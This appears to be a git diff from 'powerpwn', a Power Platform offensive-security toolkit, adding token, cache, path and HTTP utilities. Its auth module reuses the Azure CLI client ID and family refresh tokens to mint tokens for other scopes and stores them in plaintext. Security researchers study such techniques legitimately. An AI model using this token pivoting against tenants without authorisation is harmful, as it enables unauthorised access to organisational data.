azure_cli_client.acquire_token_by_device_flow(device_flow) # blocking + + azure_cli_app_refresh_token = azure_cli_bearer_tokens_for_graph_api.get("refresh_token") + + azure_cli_bearer_tokens_for_scope = ( + # Same client as original authorization + azure_cli_client.acquire_token_by_refresh_token( + azure_cli_app_refresh_token, + # But different scopes than original authorization + scopes=[scope], + ) + ) + + bearer = azure_cli_bearer_tokens_for_scope.get("token_type") + " " + azure_cli_bearer_tokens_for_scope.get("access_token") + logger.info(f"Access token for {scope} acquired successfully") + + # cache refresh token for cli to use in further FOCI authentication + # cache access token for required scope + tokens_to_cache = [ + TokenCache(token_key=AZURE_CLI_REFRESH_TOKEN, token_val=azure_cli_app_refresh_token), + TokenCache(SCOPE_TO_TOKEN_CACHE_TYPE[scope], bearer), + ] + put_tokens(tokens_to_cache) + logger.info(f"Token is cached in {TOKEN_CACHE_PATH}") + + return bearer + + +def acquire_token_from_cached_refresh_token(scope: str, tenant: Optional[str] = None) -> str: + """ + Leverage family refresh tokens to acquire a Graph API refresh token and exchange it for other required scopes + https://github.com/secureworks/family-of-client-ids-research + :param scope: token scope + :return: Bearer token + """ + logger.info(f"Acquiring token with scope={scope} from cached refresh token.") + + cached_refresh_token = try_fetch_token(AZURE_CLI_REFRESH_TOKEN) + + if not cached_refresh_token: + logger.info("Failed to acquire with refresh token. 
Fallback to device-flow") + return acquire_token(scope, tenant) + + azure_cli_client = __get_msal_cli_application(tenant) + + azure_cli_bearer_tokens_for_scope = ( + # Same client as original authorization + azure_cli_client.acquire_token_by_refresh_token( + cached_refresh_token, + # But different scopes than original authorization + scopes=[scope], + ) + ) + + bearer = azure_cli_bearer_tokens_for_scope.get("token_type") + " " + azure_cli_bearer_tokens_for_scope.get("access_token") + logger.info(f"Token for {scope} acquired from refresh token successfully.") + + # cache access token for required scope + tokens_to_cache = TokenCache(SCOPE_TO_TOKEN_CACHE_TYPE[scope], bearer) + put_token(tokens_to_cache) + logger.info(f"Token is cached in {TOKEN_CACHE_PATH}") + + return bearer + + +def __get_msal_cli_application(tenant: Optional[str] = None) -> msal.PublicClientApplication: + if tenant: + authority = authority = f"https://login.microsoftonline.com/{tenant}" + return msal.PublicClientApplication(AZURE_CLI_APP_ID, authority=authority, app_name=TOOL_NAME) + else: + return msal.PublicClientApplication(AZURE_CLI_APP_ID, app_name=TOOL_NAME) diff --git a/src/powerpwn/powerdump/utils/const.py b/src/powerpwn/powerdump/utils/const.py new file mode 100644 index 0000000..e668b8d --- /dev/null +++ b/src/powerpwn/powerdump/utils/const.py @@ -0,0 +1,9 @@ +CACHE_PATH = ".cache" +DATA_MODEL_FILE_EXTENSION = ".json" +SPEC_JWT_NAME = "ApiHubBearerAuth" +DATA_MODEL_VERSION = "0.0.1" +POWER_APPS_SCOPE = "https://service.powerapps.com/.default" +API_HUB_SCOPE = "https://apihub.azure.com/.default" +AZURE_CLI_APP_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46" +GRAPH_API_SCOPE = "https://graph.microsoft.com/.default" +ENCODING = "UTF8" diff --git a/src/powerpwn/powerdump/utils/json_utils.py b/src/powerpwn/powerdump/utils/json_utils.py new file mode 100644 index 0000000..3e92eb2 --- /dev/null +++ b/src/powerpwn/powerdump/utils/json_utils.py @@ -0,0 +1,114 @@ +""" +Copied from AFK +""" + +import json +import logging +from typing import Any, Callable, Dict, List, Optional, Tuple, Union + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.collect.models.base_entity import BaseEntity + +logger = logging.getLogger(LOGGER_NAME) + + +def _flatten_nested_dict(val: Any, prefix: str = "") -> List[Tuple[Any, Any]]: + res = [] + if isinstance(val, (str, int, float, bool)) or val is None: + res.append((val, prefix)) + elif isinstance(val, dict): + for k in val.keys(): + res.extend(_flatten_nested_dict(val[k], f"{prefix}.{k}")) + elif isinstance(val, (list, tuple)): + for i in range(len(val)): + res.extend(_flatten_nested_dict(val[i], f"{prefix}.{i}")) + elif isinstance(val, BaseEntity): + res.extend(_flatten_nested_dict(json.loads(val.json()), prefix)) + else: + raise ValueError(f"Unsupported type {type(val)}.") + return res + + +def flatten_nested_dict(val: Any) -> Dict[Any, Any]: + """ + Flatten nested dict recursively + @param val: nested dict + @return: flattened dict + """ + res = _flatten_nested_dict(val) + return {key: val for val, key in res} + + +def deep_compare_nested_dict(val_one: Any, val_two: Any, allow_additional_keys: bool = False) -> bool: + """ + Compare nested dict recursively + @param val_one: first nested dict + @param val_two: second nested dict + @param allow_additional_keys: if True, val_one and val_two are allowed to contains nested properties that are not present in the other. 
+ @return: whether the two dicts are equal in all nested properties + """ + val_one_flat = flatten_nested_dict(val_one) + val_two_flat = flatten_nested_dict(val_two) + + val_one_key_set = set(val_one_flat.keys()) + val_two_key_set = set(val_two_flat.keys()) + + missing_key_from_val_one = val_one_key_set.difference(val_two_key_set) + if len(missing_key_from_val_one) > 0: + logger.debug(f"val_two is missing the following elements from val_one: {missing_key_from_val_one}.") + if not allow_additional_keys: + return False + + missing_key_from_val_two = val_two_key_set.difference(val_one_key_set) + if len(missing_key_from_val_two) > 0: + logger.debug(f"val_one is missing the following elements from val_two: {missing_key_from_val_two}.") + if not allow_additional_keys: + return False + + mutual_keys = val_one_key_set.intersection(val_two_key_set) + for k in mutual_keys: + # pydantic and json load can change type of int, bool and more from str + if not json_consistent_compare(val_one_flat[k], val_two_flat[k]): + logger.debug(f"Value for key {k} does not align.") + return False + + return True + + +def json_consistent_compare(val_one: Optional[Union[str, int, bool, float]], val_two: Optional[Union[str, int, bool, float]]) -> bool: + """ + Compares values in a way consistent with json dump and load. + I.e, json_consistent_compare(val, json.loads(json.dumps(val))) is True. + @param val_one: value to compare. + @param val_two: value to compare. + @return: whether the two values are equal in a way consistent with json dump and load. + """ + if isinstance(val_one, type(val_two)) or isinstance(val_one, bool) or isinstance(val_two, bool): + return val_one == val_two + elif isinstance(val_one, str) or isinstance(val_two, str): + return str(val_one) == str(val_two) + elif isinstance(val_one, str) or isinstance(val_two, str): + return str(val_one) == str(val_two) + elif isinstance(val_one, int) and isinstance(val_two, float): + return float(val_one) == val_two + elif isinstance(val_two, int) and isinstance(val_one, float): + return float(val_two) == val_one + else: + raise ValueError(f"Unsupported type combination {type(val_one)}, {type(val_one)}.") + + +def change_obj_recu(val: Any, obj_changer: Callable[[dict], None]) -> None: + if isinstance(val, (str, int, float, bool)) or val is None: + return + elif isinstance(val, dict): + obj_changer(val) + + for k in val.keys(): + change_obj_recu(val[k], obj_changer=obj_changer) + elif isinstance(val, (list, tuple)): + for i in range(len(val)): + change_obj_recu(val[i], obj_changer=obj_changer) + elif isinstance(val, BaseEntity): + change_obj_recu(val.json(), obj_changer=obj_changer) + else: + raise ValueError(f"Unsupported type {type(val)}.") diff --git a/src/powerpwn/powerdump/utils/model_loaders.py b/src/powerpwn/powerdump/utils/model_loaders.py new file mode 100644 index 0000000..12adc4a --- /dev/null +++ b/src/powerpwn/powerdump/utils/model_loaders.py @@ -0,0 +1,109 @@ +import json +import os +import pathlib +from typing import Dict, Generator, List, Optional, Tuple + +from powerpwn.powerdump.collect.models.canvas_app_entity import CanvasApp +from powerpwn.powerdump.collect.models.connection_entity import Connection +from powerpwn.powerdump.collect.models.connector_entity import Connector +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.utils.path_utils import entities_path, env_entity_type_path + + +def 
load_resources(cache_path: str, env_id: Optional[str] = None) -> Generator[ResourceEntityBase, None, None]: + yield from load_connections(cache_path, env_id) + yield from load_canvasapps(cache_path, env_id) + yield from load_connectors(cache_path, env_id) + + +def load_connections(cache_path: str, env_id: Optional[str] = None) -> Generator[Connection, None, None]: + cache = pathlib.Path(entities_path(cache_path)) + if env_id: + connections = cache.glob(f"{env_id}/{ResourceType.connection}/*.json") + else: + connections = cache.glob(f"*/{ResourceType.connection}/*.json") + for connection in connections: + connection_path = "/".join(list(connection.parts)) + with open(connection_path, "r") as fp: + raw_connection = json.load(fp) + parsed_connection = Connection.parse_obj(raw_connection) + yield parsed_connection + + +def load_canvasapps(cache_path: str, env_id: Optional[str] = None) -> Generator[CanvasApp, None, None]: + cache = pathlib.Path(entities_path(cache_path)) + if env_id: + apps = cache.glob(f"{env_id}/{ResourceType.canvas_app}/*.json") + else: + apps = cache.glob(f"*/{ResourceType.canvas_app}/*.json") + for app in apps: + canvasapps_path = "/".join(list(app.parts)) + with open(canvasapps_path, "r") as fp: + raw_app = json.load(fp) + parsed_app = CanvasApp.parse_obj(raw_app) + yield parsed_app + + +def get_canvasapp(cache_path: str, env_id: str, app_id: str) -> CanvasApp: + canvas_apps_in_env_path = env_entity_type_path(env_id, ResourceType.canvas_app, cache_path) + app_path = pathlib.Path(f"{canvas_apps_in_env_path}/{app_id}.json") + with open(app_path, "r") as fp: + raw_app = json.load(fp) + return CanvasApp.parse_obj(raw_app) + + +def get_connection(cache_path: str, env_id: str, connection_id: str) -> Connection: + canvas_apps_in_env_path = env_entity_type_path(env_id, ResourceType.connection, cache_path) + app_path = pathlib.Path(f"{canvas_apps_in_env_path}/{connection_id}.json") + with open(app_path, "r") as fp: + raw_app = json.load(fp) + return Connection.parse_obj(raw_app) + + +def get_connector(cache_path: str, env_id: str, api_name: str) -> Connector: + connectors_path = env_entity_type_path(env_id, ResourceType.connector, cache_path) + with open(os.path.join(connectors_path, api_name + ".json")) as fp: + spec = Connector.parse_obj(json.load(fp)) + return spec + + +def load_connectors(cache_path: str, env_id: Optional[str] = None) -> Generator[Connector, None, None]: + cache = pathlib.Path(entities_path(cache_path)) + if env_id: + connectors = cache.glob(f"{env_id}/{ResourceType.connector}/*.json") + else: + connectors = cache.glob(f"*/{ResourceType.connector}/*.json") + + for connector in connectors: + connector_file = "/".join(list(connector.parts)) + with open(connector_file, "r") as fp: + raw_spec = json.load(fp) + parsed_spec = Connector.parse_obj(raw_spec) + yield parsed_spec + + +def get_environment_ids(cache_path: str) -> List[str]: + return os.listdir(entities_path(cache_path)) + + +def map_connection_id_to_connector_id_and_env_id(connections: Generator[Connection, None, None]) -> Dict[str, Tuple[str, str]]: + connection_id_to_connector_id_and_env_id: Dict[str, Tuple[str, str]] = dict() + for connection in connections: + connection_id_to_connector_id_and_env_id[connection.connection_id] = connection_id_to_connector_id_and_env_id.get( + connection.connection_id, (connection.connector_id, connection.environment_id) + ) + + return connection_id_to_connector_id_and_env_id + + +def map_connector_id_and_env_id_to_connection_ids(connections: Generator[Connection, None, 
+    connector_id_and_env_id_to_connection_ids: Dict[Tuple[str, str], List[str]] = dict()
+    for connection in connections:
+        if connection.environment_id.startswith("default"):
+            connection.environment_id = connection.environment_id.replace("default", "Default")
+        connector_id_and_env_id_to_connection_ids[
+            (connection.connector_id, connection.environment_id)
+        ] = connector_id_and_env_id_to_connection_ids.get((connection.connector_id, connection.environment_id), []) + [connection.connection_id]
+
+    return connector_id_and_env_id_to_connection_ids
diff --git a/src/powerpwn/powerdump/utils/path_utils.py b/src/powerpwn/powerdump/utils/path_utils.py
new file mode 100644
index 0000000..c8aa6c6
--- /dev/null
+++ b/src/powerpwn/powerdump/utils/path_utils.py
@@ -0,0 +1,30 @@
+from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType
+from powerpwn.powerdump.utils.const import CACHE_PATH
+
+
+def entities_path(cache_path: str = CACHE_PATH) -> str:
+    return f"{cache_path}/resources"
+
+
+def env_entities_path(env_id: str, cache_path: str = CACHE_PATH) -> str:
+    return f"{cache_path}/resources/{env_id}"
+
+
+def env_entity_type_path(env_id: str, entity_type: ResourceType, cache_path: str = CACHE_PATH) -> str:
+    return f"{cache_path}/resources/{env_id}/{entity_type.value}"
+
+
+def dump_path(cache_path: str = CACHE_PATH) -> str:
+    return f"{cache_path}/dump"
+
+
+def collected_data_path(cache_path: str = CACHE_PATH) -> str:
+    return f"{cache_path}/data"
+
+
+def env_collected_data_path(env_id: str, cache_path: str = CACHE_PATH) -> str:
+    return f"{collected_data_path(cache_path)}/{env_id}"
+
+
+def resource_collected_data_path(env_id: str, resource_id: str, resource_type: ResourceType, cache_path: str = CACHE_PATH) -> str:
+    return f"{env_collected_data_path(env_id, cache_path)}/{resource_type}/{resource_id}"
diff --git a/src/powerpwn/powerdump/utils/requests_wrapper.py b/src/powerpwn/powerdump/utils/requests_wrapper.py
new file mode 100644
index 0000000..43965bf
--- /dev/null
+++ b/src/powerpwn/powerdump/utils/requests_wrapper.py
@@ -0,0 +1,88 @@
+import logging
+import time
+from typing import Any, Dict, List, Optional
+
+import requests
+
+from powerpwn.const import LOGGER_NAME, TOOL_NAME
+
+logger = logging.getLogger(LOGGER_NAME)
+
+
+def init_session(token: str) -> requests.Session:
+    session = requests.Session()
+    session.headers = {"accept": "application/json", "Authorization": token, "User-Agent": TOOL_NAME}
+    return session
+
+
+def consecutive_gets(
+    session: requests.Session,
+    expected_status_prefix: str = "200",
+    property_to_extract_data: str = "value",
+    property_for_pagination: str = "continuationToken",
+    **kwargs,
+):
+    value: List[Dict[str, Any]] = []
+    success = False
+    cont_token = ""  # nosec
+
+    resp_obj = {property_for_pagination: "NOT_EMPTY"}
+    while resp_obj.get(property_for_pagination) not in (None, cont_token):
+        cont_token = resp_obj.get(property_for_pagination, "")
+
+        success, _, resp_obj = request_and_verify(session=session, expected_status_prefix=expected_status_prefix, method="get", **kwargs)
+        if not success:
+            break
+
+        if property_to_extract_data not in resp_obj and value != []:
+            raise ValueError("Inconsistent responses.")
+        if property_to_extract_data not in resp_obj and value == []:
+            logger.warning(f"Expected an array response, received an object: {resp_obj}. Request: {kwargs}.")
Request: {kwargs}.") + success = True + value += [resp_obj] + else: + success = True + value += resp_obj[property_to_extract_data] + + return success, value + + +def request_and_verify(session: requests.Session, expected_status_prefix: str = "200", is_json_resp: bool = True, **kwargs): + success = False + resp_obj = None + resp_head = None + + logger.debug(f"Triggering request ({kwargs}).") + resp = session.request(**kwargs) + resp_obj = __get_resp_obj(resp) if is_json_resp else resp.text + if str(resp.status_code).startswith(expected_status_prefix): + resp_head = resp.headers + success = True + else: + if resp.status_code == 429: + __handle_throttling(resp_obj) + return request_and_verify(session, expected_status_prefix, **kwargs) + logger.info(f"Failed at request ({kwargs}) with status_code={resp.status_code} and content={str(resp.content)}.") + + return success, resp_head, resp_obj + + +def __get_resp_obj(resp) -> Optional[Dict]: + resp_obj = None + try: + resp_obj = resp.json() + except requests.exceptions.JSONDecodeError: + return None + + return resp_obj + + +def __handle_throttling(resp_obj) -> None: + message = resp_obj.get("message", "") if resp_obj else "" + throttling_message_prefix = "Rate limit is exceeded. Try again in " + if throttling_message_prefix in message: + seconds_to_wait = int(message.partition(throttling_message_prefix)[2].partition(" seconds")[0]) + logger.info(f"API throttled, going to sleep {seconds_to_wait + 1} before retry") + time.sleep(seconds_to_wait + 1) + else: + time.sleep(20) diff --git a/src/powerpwn/powerdump/utils/token_cache.py b/src/powerpwn/powerdump/utils/token_cache.py new file mode 100644 index 0000000..f795e5b --- /dev/null +++ b/src/powerpwn/powerdump/utils/token_cache.py @@ -0,0 +1,42 @@ +import json +import os +from typing import Dict, List, NamedTuple, Optional + +TOKEN_CACHE_PATH = os.path.join(os.getcwd(), "tokens.json") + + +class TokenCache(NamedTuple): + token_key: str + token_val: str + + +def put_token(token_to_cache: TokenCache) -> None: + put_tokens([token_to_cache]) + + +def try_fetch_token(token_type: str) -> Optional[str]: + if not os.path.exists(TOKEN_CACHE_PATH): + return None + + tokens = __load_tokens() + return tokens.get(token_type) + + +def put_tokens(tokens: List[TokenCache]) -> None: + cached_tokens = {} + if os.path.exists(TOKEN_CACHE_PATH): + # json.load fails on "w+" permission + cached_tokens = __load_tokens() + f = open(TOKEN_CACHE_PATH, "w") + for token in tokens: + cached_tokens[token.token_key] = token.token_val + f.write(json.dumps(cached_tokens, indent=4)) + f.close() + + +def __load_tokens() -> Dict[str, str]: + with open(TOKEN_CACHE_PATH) as file: + try: + return json.load(file) + except json.decoder.JSONDecodeError: + return {}